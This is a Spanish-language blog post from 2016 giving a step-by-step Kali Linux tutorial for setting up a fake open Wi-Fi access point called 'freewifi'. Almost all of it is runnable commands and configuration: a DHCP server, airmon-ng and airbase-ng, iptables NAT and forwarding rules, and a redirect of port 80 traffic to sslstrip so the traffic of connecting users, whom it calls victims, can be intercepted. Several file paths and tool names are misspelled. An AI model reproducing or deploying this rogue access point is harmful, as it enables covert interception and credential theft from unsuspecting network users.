viernes, 10 de junio de 2016

Crear una red wifi falsa

En primer lugar, vamos a crear el escenario siguiente:

10.0.0.0 → Red falsa.
192.168.1.0 → Red real.

eth0 → Tarjeta de red conectada a internet.
wlan0 → Tarjeta de red que dará el acceso wifi.
En primer lugar, deberemos instalar el servidor dhcp

En kali Linux 2 Rolling, editaremos el archivo de fuentes /etc/apt/sources.list

añadimos:
deb http://http.kali.org/kali kali-rolling main contrib non-free



apt-get update

apt-get install isc-dhcp-server

editamos /etc//dhcpd/dhcpd.conf y añadimos:

authoritative;
default-lease-time 1000;
max-lease-time 8000;
subnet 10.0.0.0 netmask 255.255.255.0 {
option routers 10.0.0.1;
option subnet-mask 255.255.255.0;
option domain-name “freewifi”;
option domain-name-servers IP_DEL_DNS_DE_TU_PROVEEDOR;
range 10.0.0.2 10.0.0.40;
}

Si tienes Kali Linux 2 o Rolling, editamos el archivo /etc/NeworkManager/NetworkManager.conf y añadimos:

[keyfile]
unmanaged-devices=interface-name:wlan0mon;interface-name:wlan1mon;interface-name:wlan2mon;interface-name:wlan3mon;interface-name:wlan4mon;interface-name:wlan5mon;interface-name:wlan6mon;interface-name:wlan7mon;interface-name:wlan8mon;interface-name:wlan9mon;interface-name:wlan10mon;interface-name:wlan11mon;interface-name:wlan12mon



ifconfig wlan0 up

airmon-ng start wlan0

airbase-ng -c 1 -e freewifi wlan0mon



Si usáis Virtual Box y os da un error, probad con poner la habilitación USB 3.0 en la configuración de la máquina virtual.

Abrimos una nueva terminal

Vamos poniendo lo siguiente:

ifconfig at0 10.0.0.1 netmask 255.255.255.0
ifconfig at0 mtu 1400
route add -net 10.0.0.0 netmask 255.255.255.0 gw 10.0.0.1
echo 1 > /proc/sys/net/ipv4/ip_forward
iptables -F
iptables -t nat -A PREROUTING -p udp -j DNAT --to 192.168.1.1
iptables -P FORWARD ACCEPT
iptables --append FORWARD --in-interface at0 -j ACCEPT
iptables --table nat --append POSTROUTING --out-interface eth0 -j MASQUERADE
dhcpd -cf /etc/dhcpd.conf -pf /var/run/dhcpd.pid at0

Si os da un error, tenéis que poner touch /var/lib/dhcp/dhcpd.leases y volvéis a poner dhcpd -cf /etc/dhcpd.conf -pf /var/run/dhcpd.pid at0

/etc/init.d/isc-dhcp-server start



Si la víctima no consigue obtener la IP, reinstalar aircrack-ng con apt-get install aircrack-ng para que actualice airbase-ng.

Si queremos usar ssltrip u otro proxy, deberemos, cuando configuremos iptables, poner también:

iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 10000

(en el caso de sstrip. Usar la configuración que sea para el proxy que utilicéis)-




No hay comentarios:

Publicar un comentario

Nota: solo los miembros de este blog pueden publicar comentarios.